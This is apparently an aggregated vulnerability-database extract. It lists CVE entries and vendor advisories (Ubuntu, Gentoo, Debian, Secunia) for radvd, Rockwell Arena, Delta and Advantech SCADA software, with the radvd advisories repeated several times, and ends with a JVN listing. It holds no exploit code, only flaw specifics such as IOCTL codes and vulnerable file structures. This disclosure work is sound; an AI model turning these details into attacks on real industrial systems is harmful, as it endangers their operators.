http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-000068 Seiko Solutions SkyBridge BASIC MB-A130 vulnerable to OS command injection 2025-09-01T16:21+09:00 2025-09-01T16:21+09:00
jvndb-2025-012659 Denial-of-service (DoS) vulnerability in Konica Minolta bizhub series 2025-09-01T15:22+09:00 2025-09-01T15:22+09:00
jvndb-2025-000067 Multiple vulnerabilities in multiple iND products 2025-08-29T14:47+09:00 2025-08-29T14:47+09:00
jvndb-2025-000066 Improper file access permission settings in multiple i-FILTER products 2025-08-27T19:50+09:00 2025-08-27T19:50+09:00
jvndb-2025-000064 Multiple vulnerabilities in SS1 2025-08-27T15:13+09:00 2025-08-27T15:13+09:00
jvndb-2025-000065 ScanSnap Manager installers vulnerable to privilege escalation 2025-08-27T14:22+09:00 2025-08-27T14:22+09:00
jvndb-2025-011884 FUJIFILM Healthcare Americas Synapse Mobility vulnerable to Privilege Escalation 2025-08-21T11:49+09:00 2025-08-25T10:38+09:00
jvndb-2025-000063 Western Digital Kitfox registers a Windows service with an unquoted file path 2025-08-22T13:37+09:00 2025-08-22T13:37+09:00
jvndb-2025-000062 Multiple vulnerabilities in Group-Office 2025-08-21T14:03+09:00 2025-08-21T14:03+09:00
jvndb-2025-000061 Multiple vulnerabilities in Movable Type 2025-08-20T15:30+09:00 2025-08-20T15:30+09:00
jvndb-2025-000059 Seagate Toolkit registers a Windows service with an unquoted file path 2025-08-14T12:32+09:00 2025-08-19T14:40+09:00
jvndb-2025-010854 Trend Micro Endpoint security products for enterprises vulnerable to multiple OS command injection 2025-08-07T12:25+09:00 2025-08-19T11:36+09:00
jvndb-2025-007521 Multiple Brother driver installers for Windows vulnerable to privilege escalation 2025-06-27T09:37+09:00 2025-08-19T11:29+09:00
jvndb-2025-000060 PgManage vulnerable to injection 2025-08-18T13:40+09:00 2025-08-18T13:40+09:00
